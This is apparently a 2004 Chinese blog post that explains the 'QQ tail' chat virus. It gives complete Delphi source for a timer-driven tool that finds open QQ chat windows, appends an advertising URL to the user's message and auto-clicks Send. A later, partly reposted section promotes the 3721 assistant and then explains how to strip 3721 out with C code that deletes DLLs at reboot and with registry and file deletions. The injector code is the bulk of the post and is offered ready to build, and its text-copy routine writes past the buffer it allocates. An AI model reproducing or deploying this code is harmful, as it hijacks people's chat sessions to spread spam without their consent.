QQ尾巴原理!针对菜鸟!

近来QQ尾巴病毒大肆发作,我也是经常收到网友们发到来的带尾巴的消息,于是,好奇心一来,我也来研究研究此病毒的发作原理。首先,我不知道QQ尾巴病毒真正的原理,我只是猜测并且自己写了一个类似的程序来实现它。 QQ尾巴的发作情况:当用户打开一个QQ消息发送窗口时,病毒会自动往消息文本框里输入文本,然后不等用户反应过来就发出去了。

程序实现:首先要找到QQ消息发送窗口的句柄以及消息文本框与“发送”按钮的窗口句柄。

一、 如何找到QQ消息发送窗口句柄:

QQ消息发送窗口有两种,一种是消息模式,在这种情况下,窗口标题含有“发送消息”字样;一种是聊天模式,窗口标题含有“聊天中”字样;

通过枚举窗口就可找到相应的句柄:

// 取得QQ的发送消息窗口

function GetQQWnd: HWND;

var

hCurrentWindow: HWnd;

WndText:String;

begin

hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST);

while hCurrentWindow <> 0 do

begin

WndText:=GetWndText(hCurrentWindow);

if (Pos('聊天中',WndText)>0) or (Pos('发送消息',WndText)>0) then

begin

Result:=hCurrentWindow;

Exit;

end;

hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT);

end;

Result:=0;

end;

二、 如何找到“发送”按钮窗口句柄:

找到了QQ的发送消息窗口后,就可以进一步查找“发送”按钮句柄了,如窗口句柄为qqWnd,则可以用一个循环,查找文本中含有“发送”字样的窗口,经过试验发现,“发送”按钮恰恰是窗体的第一个子窗口,这样,可以用

btnWnd:=GetDlgItem(qqWnd,1); // 发送按钮

来获得“发送”按钮的句柄。

三、 如何找到消息文本框窗口句柄:

消息文本框并不好找,不过你可以先在消息文本框中输入几个字母,如“abcd”,这样我们就可以用上述方法来查找了,不过通过实验后,发现消息文本框并不是QQ窗口的直接子窗口,而是其中一个子窗口的子窗口,通过实验,可以用

txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD); // 文本框

来获得。

四、 如何获得原消息文本框的文本:

要获取原消息文本框的文本,只需要一个API函数就行了,如下:

// 获得窗口文本

function GetWndText(hWnd: HWND): String;

Var

Ret:LongInt;

mText:PChar;

Buf:Integer;

begin

Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1;

GetMem(mText,Ret);

try

Buf:=LongInt(mText);

SendMessage(hWnd,WM_GETTEXT,Ret,Buf);

Result:=StrPas(mText);

finally

FreeMem(mText,Ret);

end;

end;

五、 如何住原消息文本框里追加文本:

与取文本相反

// 发送文本到窗口

procedure SetWndText(hWnd: HWND; Text: String);

Var

Ret:LongInt;

mText:PChar;

Buf:Integer;

begin

GetMem(mText,Length(Text));

StrCopy(mText,PChar(Text));

try

Buf:=LongInt(mText);

SendMessage(hWnd,WM_SETTEXT,0,Buf);

finally

FreeMem(mText,Length(Text));

end;

end;

六、 如果让“发送”按钮自动点击:

一切都准备好了,现在要开始发送了,为了让消息自动发送,我们可以模拟“发送”按钮被点击了。

SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0);

SendMessage(btnWnd,WM_LBUTTONUP,0,0);

通过模拟一个鼠标在“开始”按钮上的按下与放开,就实现了点击发送功能。

七、 其它的定时功能比较简单,在此也不多说了。

八、 全部源代码如下:

unit Unit1;

interface

uses

Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

Dialogs, StdCtrls, ExtCtrls;

type

TForm1 = class(TForm)

Timer1: TTimer;

Button1: TButton;

Edit1: TEdit;

Label1: TLabel;

Button2: TButton;

procedure Timer1Timer(Sender: TObject);

procedure Button1Click(Sender: TObject);

procedure Button2Click(Sender: TObject);

private

{ Private declarations }

public

{ Public declarations }

end;

var

Form1: TForm1;

implementation

{$R *.dfm}

// 获得窗口文本

function GetWndText(hWnd: HWND): String;

Var

Ret:LongInt;

mText:PChar;

Buf:Integer;

begin

Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1;

GetMem(mText,Ret);

try

Buf:=LongInt(mText);

SendMessage(hWnd,WM_GETTEXT,Ret,Buf);

Result:=StrPas(mText);

finally

FreeMem(mText,Ret);

end;

end;

// 发送文本到窗口

procedure SetWndText(hWnd: HWND; Text: String);

Var

Ret:LongInt;

mText:PChar;

Buf:Integer;

begin

GetMem(mText,Length(Text));

StrCopy(mText,PChar(Text));

try

Buf:=LongInt(mText);

SendMessage(hWnd,WM_SETTEXT,0,Buf);

finally

FreeMem(mText,Length(Text));

end;

end;

// 取得QQ的发送消息窗口

function GetQQWnd: HWND;

var

hCurrentWindow: HWnd;

WndText:String;

begin

hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST);

while hCurrentWindow <> 0 do

begin

WndText:=GetWndText(hCurrentWindow);

if (Pos('聊天中',WndText)>0) or (Pos('发送消息',WndText)>0) then

begin

Result:=hCurrentWindow;

Exit;

end;

hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT);

end;

Result:=0;

end;

// 定时处理

procedure TimerProc;

var

qqWnd,txtWnd,btnWnd:HWND;

Msg:String;

begin

qqWnd:=GetQQWnd;

if qqWnd=0 then Exit;

btnWnd:=GetDlgItem(qqWnd,1); // 发送按钮

txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD); // 文本框

if (btnWnd=0) or (txtWnd=0) then Exit;

Msg:=GetWndText(txtWnd);

Msg:=Msg+#13+#10+'欢迎光临绿荫网http://www.lvyin.net';

SetWndText(txtWnd,Msg);

SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0);

SendMessage(btnWnd,WM_LBUTTONUP,0,0);

end;

procedure TForm1.Timer1Timer(Sender: TObject);

begin

TimerProc;

end;

procedure TForm1.Button1Click(Sender: TObject);

begin

Timer1.Enabled :=not Timer1.Enabled;

if Timer1.Enabled then

Button1.Caption :='停 止'

else

Button1.Caption :='开 始';

end;

procedure TForm1.Button2Click(Sender: TObject);

begin

Timer1.Interval :=StrToInt(Edit1.Text);

end;

end.

这些就是QQ尾巴发送的原理了,看下面关于3721的修复方法

  试过了几款清除QQ尾巴的软件,包括腾讯官方推出的专杀工具,但是凭心而论,还是3721上网助手最出彩。因为它不仅可以清除QQ尾巴病毒,还能修复被QQ尾巴病毒篡改的系统、保护IE免受QQ尾巴病毒的袭击。

  一、清除QQ尾巴


 

  如下2个简单步骤,即可彻底清除隐藏在您系统中的QQ尾巴:


 

  1、点击IE工具栏上上网助手图标中的一键修复IE浏览器(如图1)


 



 

  2、弹出提示对话框,点击“是”


 

  与目前的一些专杀QQ尾巴的软件相比,用上网助手清除QQ病毒更有效果。因为QQ尾巴病毒是在不断升级的,我们只有不断下载最新版本的软件,才能保证清除最新的QQ尾巴病毒。而使用上网助手就不用考虑这一点。而且3721不需要更新~不过~我也很讨厌它!下面教大家如何卸载3721!

这里附上它的源代码,通过代码可以看出这不是木马。

#include "windows.h"
#include "winbase.h"

void main()
{
char buf[MAX_PATH];
::ZeroMemory(buf, MAX_PATH);
::GetWindowsDirectory(buf, MAX_PATH);
char filename[MAX_PATH];
::ZeroMemory(filename, MAX_PATH);
strcpy(filename, buf);
strcat(filename, "\\Downloaded Program Files\\CnsMinIO.dll");
::MoveFileEx(filename, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
::ZeroMemory(filename, MAX_PATH);
strcpy(filename, buf);
strcat(filename, "\\Downloaded Program Files\\CnsMin.dll");
::MoveFileEx(filename, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
::ZeroMemory(filename, MAX_PATH);
strcpy(filename, buf);
strcat(filename, "\\Downloaded Program Files\\cnsio.dll");
::MoveFileEx(filename, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
}

  下面将给大家卸载这个插件的详细过程。

由于这个3721网络实名插件是使用Rundll32.exe调用连接库的,系统无法终止Rundll32.exe进程,所以我们必须重新启动计算机,按 F8 进入安全模式(F8 只能按一次,千万不要多按!)

  之后,单击 开始 -> 运行 regedit.exe 打开注册表,进入:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除键:CnsMin
其键值为:Rundll32.exe C:\WINNT\DOWNLO~1\CnsMin.dll,Rundll32
(如果是win98,这里的 C:\WINNT\DOWNLO~1\ 为 C:\WINDOWS\DOWNLO~1\)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\
删除整个目录:!CNS
这个目录在 Internet 选项 -> 高级 中加入了3721网络实名的选项。

HKEY_LOCAL_MACHINE\SOFTWARE\3721\ 以及 HKEY_CURRENT_USER\Software\3721\
删除整个目录:3721

注:如果您安装了3721的其它软件,如“极品飞猫”等,则应删除
整个目录:HKEY_LOCAL_MACHINE\SOFTWARE\3721\CnsMin
  以及 HKEY_CURRENT_USER\Software\3721\CnsMin

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\
删除键:CNSEnable 其键值为:a2c39d5f
删除键:CNSHint 其键值为:a2c39d5f
删除键:CNSList 其键值为:a2c39d5f


  在删除完注册表中的项之后,还需要删除存储在硬盘中的3721网络实名文件。

  删除如下文件:

  C:\WINNT\DOWNLO~1 目录下
  (如果是win98,这里的 C:\WINNT\DOWNLO~1\ 为 C:\WINDOWS\DOWNLO~1\ 下同)

2001-08-09 15:34

3721
2001-08-02 17:03 40,960 cnsio.dll
2001-08-08 14:14 102,400 CnsMin.dll
2001-08-24 23:14 42 CnsMin.ini
2001-08-09 10:18 13,848 CnsMinEx.cab
2001-07-06 17:57 32,768 CnsMinEx.dll
2001-08-25 02:52 115 CnsMinEx.ini
2001-08-25 02:51 17,945 CnsMinIO.cab
2001-08-02 17:02 32,768 CnsMinIO.dll
2001-08-24 23:15 40,793 CnsMinUp.cab

C:\WINNT\DOWNLO~1\3721 目录下

2001-08-02 17:03 40,960 cnsio.dll
2001-08-24 15:53 102,400 CnsMin.dll
2001-07-06 17:59 213 CnsMin.inf
2001-08-24 15:48 28,672 CnsMinIO.dll

  以上文件全部删除,这样3721网络实名“病毒”就从您的计算机中全部清除了。

  最后,重新启动计算机,进入正常模式。现在已经完全没有3721网络实名的困扰了!

  这些文章其中部分是转载的~我修改了一下~希望因为这些问题而困扰的朋友们可以看一下!

posted on 2004-07-09 23:48  Meng Zhang Home  阅读(4193)  评论(9)    收藏  举报

导航